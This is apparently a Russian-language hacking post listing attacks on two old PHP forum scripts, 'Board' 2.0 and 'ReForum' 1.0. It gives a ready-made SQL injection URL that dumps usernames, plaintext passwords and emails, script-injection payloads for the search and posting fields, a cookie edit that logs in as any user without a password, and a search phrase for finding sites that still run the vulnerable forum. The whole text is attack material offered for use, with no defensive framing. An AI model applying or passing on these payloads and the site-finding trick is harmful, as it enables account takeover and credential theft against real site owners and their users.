Форум: Board
Версия: 2.0
1. SQL инъекция
Сценарий
view_all_topic.php.
Уязвим параметр
m_id.
------------
PHP код:
$sql2="select m_id as reply,name,email,msg,date_format(m_date,'%d.%m.%Y %T') as date, subject from $dbtable where r_id =$m_id order by date";
$result=mysql_query($sql2,$db);
Параметр передаёться, как есть, без какой либо фильтрации.
------------
Делаем запрос к БД в результате, логин, пароль (пароль не зашифрован) и мыло пользователя:
Код:
http://site.ru/forum/view_all_topic.php?m_id=-1+union+select+concat(id,char(58),name,char(58),password,char(58),email),2,3,4,5+from+board000_users/*
2. Пасивная XSS
В поиске вводим
<script>alert();</script> - скрипт выпольнится.
3. Активная XSS
При создание темы/сообщения вписываем в поле заголовка сообщения или в текст сообщения
<script>alert();</script> - скрипт будет выпольняться при ответе на данное сообщение/тему.
4. Возможность заходить от любого пользователя, без ввода пароля.
Смотрим содержимое куков:
board_user_cook=qwerty; board_user_id=3
board_user_cook - имя пользователя
board_user_id - номер пользователя
Теперь меняем эти значения:
К примеру есть пользователь max и его номер 1:
board_user_cook=max; board_user_id=1
Всё теперь вы пользователь max.
------------
В Опере значение куков менять так:
Инструменты - Дополнительно - Cookies
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Copyright ° CarLine 2002г.
Не смотря на то, что форум старый сайтов с таким форумом достаточно много.
------------------------------------------------------------
------------------------------------------------------------
Форум: ReForum
Версия: 1.0
SQL инъекция
Уязвим параметр
viewth.
Код:
http://site.ru/forum/?viewth=2
http://site.ru/forum/index.php?viewth=2
------------------------------------------------------------